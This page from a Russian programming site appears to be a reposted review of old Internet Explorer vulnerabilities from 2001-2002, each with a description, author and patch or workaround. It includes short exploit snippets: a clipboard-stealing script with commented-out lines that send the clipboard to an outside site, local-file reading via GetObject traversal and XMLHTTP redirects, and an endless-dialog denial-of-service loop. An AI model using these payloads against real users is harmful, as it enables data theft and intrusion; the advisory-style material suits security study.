Навигация
Главная
Поиск
Форум
FAQ's
Ссылки
Карта сайта
Чат программистов

Статьи
-Delphi
-C/C++
-Turbo Pascal
-Assembler
-Java/JS
-PHP
-Perl
-DHTML
-Prolog
-GPSS
-Сайтостроительство
-CMS: PHP Fusion
-Инвестирование

Файлы
-Для программистов
-Компонеты для Delphi
-Исходники на Delphi
-Исходники на C/C++
-Книги по Delphi
-Книги по С/С++
-Книги по JAVA/JS
-Книги по Basic/VB/.NET
-Книги по PHP/MySQL
-Книги по Assembler
-PHP Fusion MOD'ы
-by Kest
Professional Download System
Реклама
Услуги

Автоматическое добавление статей на сайты на Wordpress, Joomla, DLE
Заказать продвижение сайта
Программа для рисования блок-схем
Инженерный калькулятор онлайн
Таблица сложения онлайн
Популярные статьи
OpenGL и Delphi... 65535
Форум на вашем ... 65535
21 ошибка прогр... 65535
HACK F.A.Q 65535
Бип из системно... 65535
Гостевая книга ... 65535
Invision Power ... 65535
Пример работы с... 65535
Содержание сайт... 65535
ТЕХНОЛОГИИ ДОСТ... 65535
Организация зап... 65535
Вызов хранимых ... 65535
Создание отчето... 65535
Имитационное мо... 65535
Программируемая... 65535
Эмулятор микроп... 65535
Подключение Mic... 65535
Создание потоко... 65535
Приложение «Про... 65535
Оператор выбора... 65535
Реклама
Сейчас на сайте
Гостей: 9
На сайте нет зарегистрированных пользователей

Пользователей: 13,367
новичок: lanoyac4
Новости
Реклама
Выполняем курсовые и лабораторные по разным языкам программирования
Подробнее - курсовые и лабораторные на заказ
Delphi, Turbo Pascal, Assembler, C, C++, C#, Visual Basic, Java, GPSS, Prolog, 3D MAX, Компас 3D
Заказать программу для Windows Mobile, Symbian

Двунаправленный динамический список на Delphi + Блок схемы
Диплом - база данных поставщиков на Delphi (MS Sql Server)+ Пояснительна...
Создание последовательности окон и передвижение окон по экрану на Turbo ...

Обзор уязвимостей Internet Explorer
Похищение содержимого буфера обмена
Описание: Начиная с пятой версии имеется возможность считывать и записывать буфер обмена из скрипта, по умолчанию, и без предупреждения. Это может быть полезно для веб-приложений, но может быть использовано злоумышленником для похищения буфера обмена.
function checkClip() { try { var newStr =
clipboardData.getData("Text"); } catch(e) { clearInterval(clipInt);
alert("Couldn't gain access
to the clipboard contents"); } if (clipStr != newStr)
{ // These commented-out lines would send the clipboard
contents. // xmlhttp.open("GET", "http://my.site.com/mysсript.asp",
false); // xmlhttp.send(newStr); alert("This sсript
could now have sent...\n\n" + newStr + "\n\n...to
me!"); clipStr = newStr; } }
Образец применения.
Решение: Измените значение опции Tools > Internet Options > Security > Select a security zone > Custom Level > sсripting > Allow paste operations via sсript.
Автор: Том Глайдер. 12 января 2001.
Подробности об автоматическом запуске программ Об этой уязвимости мы коротко рассказывали ранее, в «Сводке по уязвимостям Internet Explorer 5.0, 5.5, 6.0» под заголовком «Подделка расширения файла». Джоуко Пыннонен, открывший эту уязвимость, опубликовал подробности. Трюк оказался простым — надо просто добавить символ с ASCII-кодом 0 в имя файла. Веб-сервер злоумышленника может установить через заголовок Content-disposition такое имя файла, как README.TXT%00PROG.EXE. Если файл пересылается сервером, как attachment (речь о параметре заголовка Content-disposition, а не приложенном к письму файле), то IE отобразит в диалоге скачивания файла только README.TXT (если не установлена заплатка). Видимо, %00 декодируется, и функции отображения строк трактуют символ, как конец null-terminated строки. А если пользователь нажмёт кнопку «Открыть», то будет использовано полное имя файла и программа запустится.
Если в заголовке Content-disposition вместо attachment написать inline, и правильно выбрать MIME-тип, то браузер скачает и запустит программу без всяких диалогов и предупреждений. MIME-тип может быть установлен через заголовок Content-type. MIME-типы, вызывающие автоматическое открытие файла различаются от версии к версии. Например в IE6 это text/css, а в IE5 audio/midi.
Решение: заплатка от 13 декабря 2001 года.
Подмена расширения файла в Windows Explorer («Проводник») Назовите любой exe-файл «file.html .exe». Используйте символ ASCII с кодом 255 (FF) вместо пробелов. Посмотрите на файл в Windows Explorer — всё, вы увидите только file.html. .exe будет на другой строке... Эээ... Это сложно объяснить, поиграйтесь с эитм и вы сами всё поймёте. Я уверен, что вы можете таким же образом подменить имя файла в Internet Explorer. Также я экспериментировал с именами файлов вроде www.something.com — они выглядят, как интернет-адреса, но на самом деле исполняемые файлы.
Автор: Том Миклович. 15 января 2001.
SuperCookies, обходящие настройки обычных cookie и P3P Описание: Есть проблема с приватностью в Internet Explorer. Она возникла из-за ошибки разработки Windows Media Player (WMP). Используя простой javаsсript веб-сайт может захватить уникальный номер WMP, принадлежащий посетителю сайта. Номер может быть использован как cookie для отслеживания путей пользователя по интернету. Этот ID является SuperCookie, поскольку он может быть использован сайтами для обхода всех средств защиты приватности, добавленных Microsoft в IE 6, который сейчас поставляется со всеми версиями Windows XP. SuperCookies также работают во всех предыдущих версиях IE и Windows. Эксплоит:



alert(document.WMP.ClientID);


Пример использования SuperCookie.

Проблема с функцией GetObject()
Уязвимые версии: 5.5, 6.0.
Описание: Забавная уязвимости вида directory transversal, позволяет убрать из URL протокол и читать локальные файлы. a=GetObject("http://"+lоcation.host+"/../../../../../../test.txt","htmlfile"); Решение: Отключить Active sсripting и никогда не включать. Лучше вообще не использовать Internet Explorer в опасных окружениях, к каким принадлежит интернет.
Автор: Георгий Гунинский. 01 января 2002.
Дополнение от the Pull
Есть ещё кое-что. Я нашёл способ получать информацию о местоположении некоторых файлов. Вот стандартный адрес index.dat: file:///::{450D8FBA-AD25-11D0-98A8-0800361B1103}/../ Local%20Settings/ Temporary%20Internet%20Files/ Content.IE5/index.dat (Пробелы из адреса необходимо убрать. Таких адресов существует много, их использование, правда, может быть неодинаково успешным.)
Код ниже использует этот адрес, показывая полный путь к файлу во всплывающем окне. setTimeout("alert (funObject2.document.body.innerHTML)",500);')" Автор: the Pull. 2 января 2001.
Возможность узнать наличие файла в системе
Описание: Я обнаружил, что вы можете запросить систему о наличии любого файла, если знаете путь к нему. Вот скрипт: Автор: Том Милкович. 3 января 2001.
Локальный DoS с использованием немодальных всплывающих окон
Описание: В Internet Explorer 6 (и, возможно, 5.0) есть баг, который позволяет javаsсript вызвать огромное количество немодальных диалогов, содержащих страницу, вызвавшую их. Окна остаются после уничтожения процесса iexplore, продолжая нагружать процессор. Эксплоит: function exploit() { while(1) { showModelessDialog("exploit.html"); } Решение: Отключить javаsсript.
Автор: Лэнс Хитчкок мл. 6 января 2001.
Доступ к локальным файлам через компонент Microsoft.XMLHTTP
В компоненте Microsoft.XMLHTTP, поставляемом вместе с шестой версией Internet Explorer присутствует ошибка — компонент неправильно обрабатывает HTTP-редиректы на локальные файлы. Чтобы эксплоит работал необходимо знать имя файла.
Уязвимые программные продукты:
IE 6 / Windows 98
IE 6 / Windows XP
IE 6 / Windows 2000 (Service Pack 2)
Эксплоит (отображает содержимое файла C:\jelmer.txt):

function exploit() { // open the file on the users
harddisk using a http redirect var xmlhttp = new
ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jelmer.txt",
false); xmlhttp.Send(); alert(xmlhttp.responseText); }



Автор эксплоита: jelmer.
Подделка расширения файла
Администратор сервера имеет возможность назвать исполняемый файл README.TXT, index.html или sample.wav. Если пользователь выберет «открыть файл из текущего места» (open the file from its current lоcation), то приложение запуститься без предупреждений. Даже, если скачивание обычного .EXE с сервера вызывает окно с предупреждением. У пользователя нету возможности определить является ли файл программой, а не текстом, HTML или другим безопасным типом файлов.
Уязвимость открыта Jouko Pynnonen.
Уязвимые программные продукты:
IE 5.0
IE 5.5
IE 6.0
Opera 5.12
Пример: http://www.geilerserver.de/text.txt.
Предлагается открыть файл, в случае положительного ответа запускается программа (калькулятор).
Чтобы не подвергаться опасности установите кумулятивный патч Q313675 (MS Security Bulletin MS01-058). Было замечено, что патч невозможно установить через Windows Update, только вручную.
ПОХИЩЕНИЕ COOKIES, ЧТЕНИЕ ФАЙЛОВ С ДИСКА
Просто используя метод javаsсript document.open и не используя document.close можно: похищать cookies; читать локальные файлы, обрабатываемые (parsable) Internet Explorer (HTML, если быть точном); и подменять сайты.
Эксплоиты прилагаются (см. ниже). cookieStealing.html открывает Yahoo.com и похищает cookie. fileReading.html открывает и читает файл C:\test.txt. SiteSpoofing.html скрывает (на Windows 2000) или подменяет (на Windows 98) настоящий адрес документа.
Уязвимые платформы:
IE 6.0.2600.0000, Windows 2000 с установленными Q312461, Q240308, Q313675
IE 6.0.2600.0000, Windows 98 с установленным Q313675
IE 5.5, Windows 2000 SP2
Уязвимость обнаружена группой the Pull. Заплатка для устранения этой уязвимости пока не выпущена.
Как включить Пятый уровень безопасности в ie 6.0
Вообще пятый уровень всегда скрыт, т.к. обычным пользователям это не нужно. Но если Вы не обычный пользователь и Вам нужен уровень безопастности выше стандартного максимального, то тогда зайдите в редактор реестра и найдите:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternetSettingsones "Flags"=dword: 0X00000021 (33) ---default
И надо заменить опцию на
"Flags"=dword: 0X00000001 (1)
После этого перегружайтесь и - все!
Опубликовал Kest October 26 2008 13:40:55 · 0 Комментариев · 8078 Прочтений · Для печати

• Не нашли ответ на свой вопрос? Тогда задайте вопрос в комментариях или на форуме! •


Комментарии
Нет комментариев.
Добавить комментарий
Имя:



smiley smiley smiley smiley smiley smiley smiley smiley smiley
Запретить смайлики в комментариях

Введите проверочный код:* =
Рейтинги
Рейтинг доступен только для пользователей.

Пожалуйста, залогиньтесь или зарегистрируйтесь для голосования.

Нет данных для оценки.
Гость
Имя

Пароль



Вы не зарегистрированны?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.
Поделиться ссылкой
Фолловь меня в Твиттере! • Смотрите канал о путешествияхКак приготовить мидии в тайланде?
Загрузки
Новые загрузки
iChat v.7.0 Final...
iComm v.6.1 - выв...
Visual Studio 200...
CodeGear RAD Stud...
Шаблон для новост...

Случайные загрузки
Win-Prolog 3.618
Программа предназ...
Microsoft SQL Ser...
IIIDTrans
Error mod
XPmenu
Delphi 2005. Разр...
mmmJlabel
EMS QuickExport S...
Анекдоты с ostrie.ru
База для Allsubmi...
Delphi. Готовые а...
Шифрование по алг...
Encrypt Decrypt
Приложение Клиент...
ЯЗЫК ПРОГРАММИРОВ...
Игра PackMan
Java Server Pages...
SysInfo [Исходник...
Переработанный пл...

Топ загрузок
Приложение Клие... 100774
Delphi 7 Enterp... 97832
Converter AMR<-... 20268
GPSS World Stud... 17014
Borland C++Buil... 14191
Borland Delphi ... 10290
Turbo Pascal fo... 7373
Калькулятор [Ис... 5984
Visual Studio 2... 5207
Microsoft SQL S... 3661
Случайные статьи
Проверка грамматик...
может быть установ...
PHP класс для импо...
3d Принтер
Формирование списк...
Простейший пример ...
Структура жесткого...
Указатель this
Контроллер от NES,...
Новинка планшетов ...
Серверные кластеры...
Реализация стека в...
«Говорящая» подска...
Зависимости функци...
Модерация отзывов
X\=Y
Тянем-потянем за с...
Если протокол не в...
Методика проектиро...
Ограничения, связа...
Error in type
Планируйте издание...
6.3. Принципы
Преимущество автом...
Использование Outl...
Статистика



Друзья сайта
Программы, игры


Полезно
В какую объединенную сеть входит классовая сеть? Суммирование маршрутов Занимают ли таблицы память маршрутизатора?